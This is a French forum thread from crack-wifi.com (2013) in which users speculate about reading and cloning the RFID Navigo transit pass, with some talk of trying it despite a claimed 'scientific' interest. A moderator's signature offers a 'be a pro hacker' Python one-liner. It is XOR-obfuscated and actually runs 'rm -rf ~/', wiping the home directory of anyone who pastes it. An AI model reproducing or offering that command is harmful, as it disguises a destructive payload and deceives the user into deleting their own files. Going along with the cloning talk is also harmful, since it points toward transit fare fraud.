Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 14-02-2013 01:31:58

curieuxdu92
N00b

pass navigo

Bonsoir à tous,
Je suis heureux de faire partie de la communauté crack-wifi. Je ne doute pas un seul instant que les échanges que nous aurons seront constructifs et qu'ils se traduiront par une parfaite symbiose.
Depuis quelques jours, il est une question qui me tourneboule l'esprit. Elle concerne les pass navigo utilisés dans les transports en commun en île de france. Ces cartes utilisent la technologie rfid qui, comme tout le monde le sait, est loin d'être sécurisée eu égard aux nombreuses failles débusquées ça et là depuis son apparition.Et je subodore qu'il est tout à fait possible d’accéder via un lecteur adéquat aux informations de la carte navigo et partant, de la cloner. Qu'en pensez-vous?
Je précise que l’intérêt de mon propos est , si je puis dire,purement scientifique. Loin de moi l'idée de cloner un pass navigo pour l'utiliser sur le réseau ratp. Je me déplace d'ailleurs en voiture depuis plusieurs  années et c'est tant mieux!J'aimerais juste savoir si j'ai raison de penser que les pass navigo sont clonables. Je vous remercie d'avance pour vos réponses.

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 15-02-2013 15:22:27

antares145
Membre d'honneur
Site Web

Re : pass navigo

Salut !

Je n'ai pas entendu parler d'exploits (ni même de tests) de ce côté-là, si c'était faisable facilement je pense qu'on serait au courant smile

En théorie oui, si c'est lisible c'est clonable, mais le RFID n'est pas ma spécialité. Et s'il y a une partie de cryptographie au milieu du processus, ça complique la récupération. Genre si c'est la borne qui envoie une clé au tag pour déchiffrer son contenu, il faut que ton lecteur à toi puisse envoyer la même clé. Bref, je doute que ce soit aussi "évident" mais tu peux toujours contacter Renaud Lifchitz pour lui poser la question wink

En même temps, un lecteur RFID USB ça coûte $20 sur DealExtreme, rien ne t'empêche de faire tes tests à la maison smile

#3 15-02-2013 21:30:02

curieuxdu92
N00b

Mon cher antares,
je te suis bien obligé de m'avoir répondu. Il est vrai qu'il me tardait d'avoir une réaction depuis que j'ai ouvert cette discussion et la lumière est enfin venue de toi antares. Merci de m'avoir tiré de ma nuit lol.
j'ai fait quelques recherches sur internet et je suis tombé sur cet article qui montre à quel point il est aisé de lire le contenu caché d'un pass navigo:lire le contenu caché d'une carte navigo
Il y'a aussi d'autres moyens de lire ledit pass mais celui-ci est assez simple à mon avis. Et comme tu l'as si bien dit antares: si c'est lisible, c'est, en théorie, clonable. Il ne reste plus qu'à pousser les recherches un peu plus loin.:D

#4 16-02-2013 21:52:06

spawn
Modérateur

Une chose est sûre, tu ne pourras pas recharger ton passe en bidouillant ta carte, ton compte est dans leurs serveurs.
Peut être qu'un token caché t'empêche de copier celle du type qui a ton numéro - 1.
Tu m'as donné envie d'essayer tiens (:

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#5 16-02-2013 22:16:54

curieuxdu92
N00b

C cool spawn, on sera deux à essayer alors big_smile.N'oublie pas de nous faire part du résultat. Pour ma part, dès que je trouve quelque chose, je vous mettrai au parfum.

#6 05-03-2013 11:03:52

Kris71
N00b

Salut tous le monde.
Je me suis inscrit à ce forum parce que moi aussi je me demande comment marche mon pass Navigo et quelles informations sont stocké dessus (est-ce qu'on est tracké ou pas).

Personnellement je pense pas que l'information "abonné ou pas" soit stocké seulement sur leur serveur, pour la simple et bonne raison que les bus ne sont surement pas connecté à un quelconque réseau leur permettant de checker à chaque validation... Mais peut être que je me trompe.

D'autre part je pense que les informations sensible sont surement chiffré car la RATP vend des lecteurs/Programmeur pour leur pass Navigo maintenant. (Il est interessant de noter que ces lecteurs sont achetable seulement par CB et qu'il flash un code-bar avant de vous le donnée. (association serial number <-> CB ???)

Bref je suis avec intérêt le sujet et si j'ai des infos, je vous tiens au courant.

Annonce